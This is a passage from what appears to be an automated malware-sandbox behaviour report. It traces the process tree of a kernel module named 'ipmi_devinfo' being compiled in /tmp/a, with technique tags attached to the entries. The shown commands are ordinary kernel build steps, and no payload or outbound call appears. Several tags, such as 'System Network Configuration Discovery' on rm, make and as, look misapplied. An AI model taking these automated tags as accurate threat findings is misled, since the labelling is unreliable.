-fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -flive-patching=inline-clone -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -fmacro-prefix-map=./= -Wno-packed-not-aligned -DMODULE -DKBUILD_BASENAME='\"ipmi_devinfo\"' -DKBUILD_MODNAME='\"ipmi_devinfo\"' -c -o /tmp/a/ipmi_devinfo.o /tmp/a/ipmi_devinfo.c"5⤵PID:1967
-
-
/usr/bin/rmrm -f /tmp/a/.ipmi_devinfo.o.d5⤵
- System Network Configuration Discovery
PID:1968
-
-
-
/bin/sh/bin/sh -c "set -e; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - PIPE; kill -s PIPE \$\$' PIPE; "4⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1969
-
-
/bin/sh/bin/sh -c "set -e; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - PIPE; kill -s PIPE \$\$' PIPE; "4⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1970
-
-
/bin/sh/bin/sh -c "set -e; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - PIPE; kill -s PIPE \$\$' PIPE; "4⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1971
-
-
/bin/sh/bin/sh -c "set -e; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - PIPE; kill -s PIPE \$\$' PIPE; "4⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1972
-
-
/bin/sh/bin/sh -c "set -e; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - PIPE; kill -s PIPE \$\$' PIPE; if objdump -h /tmp/a/ipmi_devinfo.o | grep -q __ksymtab; then gcc -E -D__GENKSYMS__ -Wp,-MD,/tmp/a/.ipmi_devinfo.o.d -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/9/include -I./arch/x86/include -I./arch/x86/include/generated -I./include -I./arch/x86/include/uapi -I./arch/x86/include/generated/uapi -I./include/uapi -I./include/generated/uapi -include ./include/linux/kconfig.h -Iubuntu/include -include ./include/linux/compiler_types.h -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -flive-patching=inline-clone -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -fmacro-prefix-map=./= -Wno-packed-not-aligned -DMODULE -DKBUILD_BASENAME='\"ipmi_devinfo\"' -DKBUILD_MODNAME='\"ipmi_devinfo\"' /tmp/a/ipmi_devinfo.c | scripts/genksyms/genksyms -r /dev/null > /tmp/a/.tmp_ipmi_devinfo.ver; ld -m elf_x86_64 -z max-page-size=0x200000 -z noexecstack -r -o /tmp/a/.tmp_ipmi_devinfo.o /tmp/a/ipmi_devinfo.o -T /tmp/a/.tmp_ipmi_devinfo.ver; mv -f /tmp/a/.tmp_ipmi_devinfo.o /tmp/a/ipmi_devinfo.o; rm -f /tmp/a/.tmp_ipmi_devinfo.ver; fi"4⤵PID:1973
-
/usr/bin/grepgrep -q __ksymtab5⤵PID:1975
-
-
/usr/bin/objdumpobjdump -h /tmp/a/ipmi_devinfo.o5⤵
- System Network Configuration Discovery
PID:1974
-
-
-
/bin/sh/bin/sh -c "set -e; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - PIPE; kill -s PIPE \$\$' PIPE; "4⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1976
-
-
/bin/sh/bin/sh -c "set -e; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - PIPE; kill -s PIPE \$\$' PIPE; "4⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1977
-
-
/bin/sh/bin/sh -c "set -e; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - PIPE; kill -s PIPE \$\$' PIPE; "4⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1978
-
-
/bin/sh/bin/sh -c "set -e; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/ipmi_devinfo.o; trap - PIPE; kill -s PIPE \$\$' PIPE; "4⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1979
-
-
/bin/sh/bin/sh -c "set -e; trap 'rm -f /tmp/a/ipmi_devinfo.mod; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/ipmi_devinfo.mod; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/ipmi_devinfo.mod; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/ipmi_devinfo.mod; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/ipmi_devinfo.mod; trap - PIPE; kill -s PIPE \$\$' PIPE; { echo /tmp/a/ipmi_devinfo.o; echo; } > /tmp/a/ipmi_devinfo.mod; printf '%s\\n' 'cmd_/tmp/a/ipmi_devinfo.mod := { echo /tmp/a/ipmi_devinfo.o; echo; } > /tmp/a/ipmi_devinfo.mod' > /tmp/a/.ipmi_devinfo.mod.cmd"4⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1980
-
-
/bin/sh/bin/sh -c "{ echo /tmp/a/ipmi_devinfo.ko; :; } \\ | awk '!x[\$0]++' - > /tmp/a/modules.order"4⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1981 -
/usr/bin/awkawk "!x[\$0]++" -5⤵PID:1983
-
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1984 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1985
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1986 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1987
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1988 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1989
-
-
-
/bin/sh/bin/sh -c "test -e ./Module.symvers || ( \\ echo; \\ echo \" WARNING: Symbol version dump ./Module.symvers\"; \\ echo \" is missing; modules will have no dependencies and modversions.\"; \\ echo )"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1990
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1991 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1992
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1993 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1994
-
-
-
/bin/sh/bin/sh -c "cat include/config/kernel.release 2> /dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1995 -
/usr/bin/catcat include/config/kernel.release4⤵PID:1996
-
-
-
/usr/local/sbin/makemake -f ./scripts/Makefile.modpost3⤵
- System Network Configuration Discovery
PID:1997
-
-
/usr/local/bin/makemake -f ./scripts/Makefile.modpost3⤵
- System Network Configuration Discovery
PID:1997
-
-
/usr/sbin/makemake -f ./scripts/Makefile.modpost3⤵
- System Network Configuration Discovery
PID:1997
-
-
/usr/bin/makemake -f ./scripts/Makefile.modpost3⤵
- System Network Configuration Discovery
PID:1997 -
/usr/local/sbin/catcat /tmp/a/modules.order4⤵PID:1998
-
-
/usr/local/bin/catcat /tmp/a/modules.order4⤵PID:1998
-
-
/usr/sbin/catcat /tmp/a/modules.order4⤵PID:1998
-
-
/usr/bin/catcat /tmp/a/modules.order4⤵PID:1998
-
-
/usr/local/sbin/echoecho " Building modules, stage 2."4⤵PID:1999
-
-
/usr/local/bin/echoecho " Building modules, stage 2."4⤵PID:1999
-
-
/usr/sbin/echoecho " Building modules, stage 2."4⤵PID:1999
-
-
/usr/bin/echoecho " Building modules, stage 2."4⤵PID:1999
-
-
/bin/sh/bin/sh -c "set -e; echo ' MODPOST 1 modules'; sed 's/ko\$/o/' /tmp/a/modules.order | scripts/mod/modpost -m -a -i ./Module.symvers -I /tmp/a/Module.symvers -o /tmp/a/Module.symvers -s -T - "4⤵PID:2000
-
/usr/bin/sedsed "s/ko\$/o/" /tmp/a/modules.order5⤵PID:2001
-
-
/usr/src/linux-headers-5.4.0-169-generic/scripts/mod/modpostscripts/mod/modpost -m -a -i ./Module.symvers -I /tmp/a/Module.symvers -o /tmp/a/Module.symvers -s -T -5⤵
- Writes file to tmp directory
PID:2002
-
-
-
/usr/local/sbin/makemake -f ./scripts/Makefile.modfinal4⤵
- System Network Configuration Discovery
PID:2003
-
-
/usr/local/bin/makemake -f ./scripts/Makefile.modfinal4⤵
- System Network Configuration Discovery
PID:2003
-
-
/usr/sbin/makemake -f ./scripts/Makefile.modfinal4⤵
- System Network Configuration Discovery
PID:2003
-
-
/usr/bin/makemake -f ./scripts/Makefile.modfinal4⤵
- System Network Configuration Discovery
PID:2003 -
/usr/local/sbin/catcat /tmp/a/modules.order5⤵PID:2004
-
-
/usr/local/bin/catcat /tmp/a/modules.order5⤵PID:2004
-
-
/usr/sbin/catcat /tmp/a/modules.order5⤵PID:2004
-
-
/usr/bin/catcat /tmp/a/modules.order5⤵PID:2004
-
-
/bin/sh/bin/sh -c "set -e; echo ' CC [M] /tmp/a/ipmi_devinfo.mod.o'; trap 'rm -f /tmp/a/ipmi_devinfo.mod.o; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/ipmi_devinfo.mod.o; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/ipmi_devinfo.mod.o; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/ipmi_devinfo.mod.o; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/ipmi_devinfo.mod.o; trap - PIPE; kill -s PIPE \$\$' PIPE; gcc -Wall -Wp,-MD,/tmp/a/.ipmi_devinfo.mod.o.d -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/9/include -I./arch/x86/include -I./arch/x86/include/generated -I./include -I./arch/x86/include/uapi -I./arch/x86/include/generated/uapi -I./include/uapi -I./include/generated/uapi -include ./include/linux/kconfig.h -Iubuntu/include -include ./include/linux/compiler_types.h -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -flive-patching=inline-clone -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -fmacro-prefix-map=./= -Wno-packed-not-aligned -DMODULE -DKBUILD_BASENAME='\"ipmi_devinfo.mod\"' -DKBUILD_MODNAME='\"ipmi_devinfo\"' -c -o /tmp/a/ipmi_devinfo.mod.o /tmp/a/ipmi_devinfo.mod.c; scripts/basic/fixdep /tmp/a/.ipmi_devinfo.mod.o.d /tmp/a/ipmi_devinfo.mod.o 'gcc -Wall -Wp,-MD,/tmp/a/.ipmi_devinfo.mod.o.d -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/9/include -I./arch/x86/include -I./arch/x86/include/generated -I./include -I./arch/x86/include/uapi -I./arch/x86/include/generated/uapi -I./include/uapi -I./include/generated/uapi -include ./include/linux/kconfig.h -Iubuntu/include -include ./include/linux/compiler_types.h -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -flive-patching=inline-clone -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -fmacro-prefix-map=./= -Wno-packed-not-aligned -DMODULE -DKBUILD_BASENAME='\\''\"ipmi_devinfo.mod\"'\\'' -DKBUILD_MODNAME='\\''\"ipmi_devinfo\"'\\'' -c -o /tmp/a/ipmi_devinfo.mod.o /tmp/a/ipmi_devinfo.mod.c' > /tmp/a/.ipmi_devinfo.mod.o.cmd; rm -f /tmp/a/.ipmi_devinfo.mod.o.d"5⤵PID:2005
-
/usr/bin/gccgcc -Wall "-Wp,-MD,/tmp/a/.ipmi_devinfo.mod.o.d" -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/9/include -I./arch/x86/include -I./arch/x86/include/generated -I./include -I./arch/x86/include/uapi -I./arch/x86/include/generated/uapi -I./include/uapi -I./include/generated/uapi -include ./include/linux/kconfig.h -Iubuntu/include -include ./include/linux/compiler_types.h -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 "--param=allow-store-data-races=0" "-Wframe-larger-than=1024" -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY "-flive-patching=inline-clone" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" "-fmacro-prefix-map=./=" -Wno-packed-not-aligned -DMODULE "-DKBUILD_BASENAME=\"ipmi_devinfo.mod\"" "-DKBUILD_MODNAME=\"ipmi_devinfo\"" -c -o /tmp/a/ipmi_devinfo.mod.o /tmp/a/ipmi_devinfo.mod.c6⤵
- Writes file to tmp directory
PID:2006 -
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -nostdinc -I ./arch/x86/include -I ./arch/x86/include/generated -I ./include -I ./arch/x86/include/uapi -I ./arch/x86/include/generated/uapi -I ./include/uapi -I ./include/generated/uapi -I ubuntu/include -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_USING_FENTRY -D MODULE -D "KBUILD_BASENAME=\"ipmi_devinfo.mod\"" -D "KBUILD_MODNAME=\"ipmi_devinfo\"" -isystem /usr/lib/gcc/x86_64-linux-gnu/9/include -include ./include/linux/kconfig.h -include ./include/linux/compiler_types.h -MD /tmp/a/.ipmi_devinfo.mod.o.d /tmp/a/ipmi_devinfo.mod.c -quiet -dumpbase ipmi_devinfo.mod.c -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/ipmi_devinfo.mod.o -O2 -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=3" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" -Wno-packed-not-aligned "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments "-flive-patching=inline-clone" -fno-strict-overflow -fno-merge-all-constants -fmerge-constants "-fstack-check=no" -fconserve-stack "-fmacro-prefix-map=./=" --param "allow-store-data-races=0" -fstack-protector-strong -fstack-clash-protection -o /tmp/ccho1svT.s7⤵PID:2007
-
-
/usr/local/sbin/asas -I ./arch/x86/include -I ./arch/x86/include/generated -I ./include -I ./arch/x86/include/uapi -I ./arch/x86/include/generated/uapi -I ./include/uapi -I ./include/generated/uapi -I ubuntu/include --64 -o /tmp/a/ipmi_devinfo.mod.o /tmp/ccho1svT.s7⤵
- System Network Configuration Discovery
PID:2008
-
-
/usr/local/bin/asas -I ./arch/x86/include -I ./arch/x86/include/generated -I ./include -I ./arch/x86/include/uapi -I ./arch/x86/include/generated/uapi -I ./include/uapi -I ./include/generated/uapi -I ubuntu/include --64 -o /tmp/a/ipmi_devinfo.mod.o /tmp/ccho1svT.s7⤵
- System Network Configuration Discovery
PID:2008
-
-
/usr/sbin/asas -I ./arch/x86/include -I ./arch/x86/include/generated -I ./include -I ./arch/x86/include/uapi -I ./arch/x86/include/generated/uapi -I ./include/uapi -I ./include/generated/uapi -I ubuntu/include --64 -o /tmp/a/ipmi_devinfo.mod.o /tmp/ccho1svT.s7⤵
- System Network Configuration Discovery
PID:2008
-
-
/usr/bin/asas -I ./arch/x86/include -I ./arch/x86/include/generated -I ./include -I ./arch/x86/include/uapi -I ./arch/x86/include/generated/uapi -I ./include/uapi -I ./include/generated/uapi -I ubuntu/include --64 -o /tmp/a/ipmi_devinfo.mod.o /tmp/ccho1svT.s7⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:2008
-
-
-
/usr/src/linux-headers-5.4.0-169-generic/scripts/basic/fixdepscripts/basic/fixdep /tmp/a/.ipmi_devinfo.mod.o.d /tmp/a/ipmi_devinfo.mod.o "gcc -Wall -Wp,-MD,/tmp/a/.ipmi_devinfo.mod.o.d -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/9/include -I./arch/x86/include -I./arch/x86/include/generated -I./include -I./arch/x86/include/uapi -I./arch/x86/include/generated/uapi -I./include/uapi -I./include/generated/uapi -include ./include/linux/kconfig.h -Iubuntu/include -include ./include/linux/compiler_types.h -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -flive-patching=inline-clone -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wno-stringop-overflow 